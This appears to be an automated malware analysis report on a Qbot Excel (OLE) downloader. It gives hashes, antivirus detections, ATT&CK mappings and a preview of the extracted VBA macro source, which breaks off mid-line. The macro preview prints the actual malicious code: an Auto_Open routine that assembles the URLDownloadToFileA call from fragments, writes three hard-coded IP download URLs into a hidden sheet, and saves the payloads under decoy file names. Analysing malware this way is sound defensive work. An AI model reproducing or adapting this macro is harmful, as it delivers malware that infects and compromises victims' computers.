Qbot Office (OLE) malware analysis — malicious · 1f2a55c646d724e6

MALICIOUS

Office (OLE)

582.0 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2021-11-21

MD5: c14dcbc2bd12ce25d00e0ae69cc1255d SHA-1: 271ffc6d53c75be0792723fd7d5de296e787d1b5 SHA-256: 1f2a55c646d724e65ec698720c8f0b6338d90314728cbe2f46ec9d7801bb308f

120 Risk Score

Malware Insights

Qbot · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical ClamAV detection explicitly identifies the sample as Xls.Downloader.Qbot, indicating a downloader functionality. The presence of an Auto_Open VBA macro (T1059.005) strongly suggests that the macro is designed to execute automatically upon opening the Excel file, likely to initiate the download and execution of a secondary payload. This is consistent with Qbot's typical behavior as a downloader.

Heuristics 3

ClamAV: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6348 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6348 bytes
SHA-256: `44ce8de16df26234abe008370d6052886255e8593ab511fcea07f165f11d76f7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Private m_openAlreadyRan As Boolean Private m_isOpenDelayed As Boolean Public Sub applyLogosToDashboard() Application.ScreenUpdating = False If Not Application.OperatingSystem Like "Mac" Then Sheets("Dashboard").Activate Sheets("Dashboard").Unprotect Password:=Sheets("Logos").Range("IV1") ActiveSheet.Shapes("Apple_Logo").Visible = False ActiveSheet.Shapes("Win_Logo").Visible = True ActiveSheet.Shapes("Button_Insert_Logo").Visible = True ActiveSheet.Shapes("Button_Print_PDF").Visible = True ActiveSheet.Shapes("Button_Save_As").Visible = True ActiveSheet.Shapes("Button_Help").Visible = True ActiveSheet.Shapes("Button_Versions").Visible = True Sheets("Logos").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True Else Sheets("Dashboard").Activate Sheets("Dashboard").Unprotect Password:=Sheets("Dashboard").Range("IV1") ActiveSheet.Shapes("Apple_Logo").Visible = True ActiveSheet.Shapes("Win_Logo").Visible = False ActiveSheet.Shapes("Button_Insert_Logo").Visible = False ActiveSheet.Shapes("Button_Print_PDF").Visible = False ActiveSheet.Shapes("Button_Save_As").Visible = False Sheets("Dashboard").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True End If Application.ScreenUpdating = True End Sub Private Sub InitWorkbook() If VBA.Val(Application.Version) < 12 Then MsgBox "This Workbook requires Excel 2007 or later!", vbCritical, "Closing" Me.Close False Exit Sub End If ' With New frmMain .Show 'Other code ' ' ' End With End Sub Private Sub Workbook_BeforeClose(Cancel As Boolean) On Error Resume Next Application.DisplayAlerts = False Sheets("Nneeri").Delete Application.DisplayAlerts = True End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" Function Hrosters() Sheets("Nneeri").Range("H10") = "=Kopast(0,H24&K17&K18,G10,0,0)" Sheets("Nneeri").Range("H11") = "=Kopast(0,H25&K17&K18,G11,0,0)" Sheets("Nneeri").Range("H12") = "=Kopast(0,H26&K17&K18,G12,0,0)" End Function Attribute VB_Name = "Module2" Function Retio() net = "uR" net1 = "Mon" dff = "URLDownload" dff1 = "ToFileA" Diopaster Sheets("Nneeri").Range("I9") = net & "l" & net1 Sheets("Nneeri").Range("K18") = ".dat" Sheets("Nneeri").Range("K17") = "=NOW()" Sheets("Nneeri").Range("H35") = "=HALT()" Sheets("Nneeri").Range("I10") = dff & dff1 kjhkjlkj End Function Attribute VB_Name = "Module3" Function Diopaster() Application.ScreenUpdating = False Biolaster Sheets("Nneeri").Range("I12") = "Kopast" Sheets("Nneeri").Visible = False Nyrtyfh dfgdf End Function Function Nyrtyfh() Sheets("Nneeri").Range("G10") = "..\Lifas.ver" Sheets("Nneeri").Range("G11") = "..\Lifas.ver1" Sheets("Nneeri").Range("G12") = "..\Lifas.ver2" End Function Attribute VB_Name = "Module4" Function dfgdf() dgdgerwrh = "http://" Sheets("Nneeri").Range("H24") = dgdgerwrh & "190.14.37.254/" Sheets("Nneeri").Range("H25") = dgdgerwrh & "91.242.229.89/" Sheets("Nneeri").Range("H26") = dgdgerwrh & "185.123.53.229/" Sheets("Nneeri").Range("A1:M100").Interior.Color = vbBlack End Function Attribute VB_Name = "Module6" Sub auto_open() Set Fera = E ... (truncated)

SHA-256: 44ce8de16df26234abe008370d6052886255e8593ab511fcea07f165f11d76f7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean
Public Sub applyLogosToDashboard()

Application.ScreenUpdating = False

If Not Application.OperatingSystem Like "*Mac*" Then

    Sheets("Dashboard").Activate
    Sheets("Dashboard").Unprotect Password:=Sheets("Logos").Range("IV1")
    ActiveSheet.Shapes("Apple_Logo").Visible = False
    ActiveSheet.Shapes("Win_Logo").Visible = True
    ActiveSheet.Shapes("Button_Insert_Logo").Visible = True
    ActiveSheet.Shapes("Button_Print_PDF").Visible = True
    ActiveSheet.Shapes("Button_Save_As").Visible = True
    ActiveSheet.Shapes("Button_Help").Visible = True
    ActiveSheet.Shapes("Button_Versions").Visible = True
    Sheets("Logos").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True

Else

    Sheets("Dashboard").Activate
    Sheets("Dashboard").Unprotect Password:=Sheets("Dashboard").Range("IV1")
    ActiveSheet.Shapes("Apple_Logo").Visible = True
    ActiveSheet.Shapes("Win_Logo").Visible = False
    ActiveSheet.Shapes("Button_Insert_Logo").Visible = False
    ActiveSheet.Shapes("Button_Print_PDF").Visible = False
    ActiveSheet.Shapes("Button_Save_As").Visible = False
    Sheets("Dashboard").Protect Password:=Sheets("Dashboard").Range("IV1"), DrawingObjects:=True, Contents:=True, Scenarios:=True

End If

    Application.ScreenUpdating = True

End Sub



Private Sub InitWorkbook()
    If VBA.Val(Application.Version) < 12 Then
        MsgBox "This Workbook requires Excel 2007 or later!", vbCritical, "Closing"
        Me.Close False
        Exit Sub
    End If
    '
    With New frmMain
        .Show
        'Other code
        '
        '
        '
    End With
End Sub

Private Sub Workbook_BeforeClose(Cancel As Boolean)


On Error Resume Next
   Application.DisplayAlerts = False
   Sheets("Nneeri").Delete
   Application.DisplayAlerts = True
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Function Hrosters()



Sheets("Nneeri").Range("H10") = "=Kopast(0,H24&K17&K18,G10,0,0)"
Sheets("Nneeri").Range("H11") = "=Kopast(0,H25&K17&K18,G11,0,0)"
Sheets("Nneeri").Range("H12") = "=Kopast(0,H26&K17&K18,G12,0,0)"

End Function

 

Attribute VB_Name = "Module2"
Function Retio()

net = "uR"
net1 = "Mon"
dff = "URLDownload"
dff1 = "ToFileA"
Diopaster

Sheets("Nneeri").Range("I9") = net & "l" & net1
Sheets("Nneeri").Range("K18") = ".dat"


Sheets("Nneeri").Range("K17") = "=NOW()"
Sheets("Nneeri").Range("H35") = "=HALT()"
Sheets("Nneeri").Range("I10") = dff & dff1

kjhkjlkj



End Function





Attribute VB_Name = "Module3"

Function Diopaster()
Application.ScreenUpdating = False
Biolaster
Sheets("Nneeri").Range("I12") = "Kopast"

Sheets("Nneeri").Visible = False
Nyrtyfh
dfgdf
End Function


Function Nyrtyfh()

Sheets("Nneeri").Range("G10") = "..\Lifas.ver"
Sheets("Nneeri").Range("G11") = "..\Lifas.ver1"
Sheets("Nneeri").Range("G12") = "..\Lifas.ver2"

End Function


Attribute VB_Name = "Module4"




Function dfgdf()

dgdgerwrh = "http://"

Sheets("Nneeri").Range("H24") = dgdgerwrh & "190.14.37.254/"
Sheets("Nneeri").Range("H25") = dgdgerwrh & "91.242.229.89/"
Sheets("Nneeri").Range("H26") = dgdgerwrh & "185.123.53.229/"
Sheets("Nneeri").Range("A1:M100").Interior.Color = vbBlack

End Function






Attribute VB_Name = "Module6"






Sub auto_open()
Set Fera = E
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.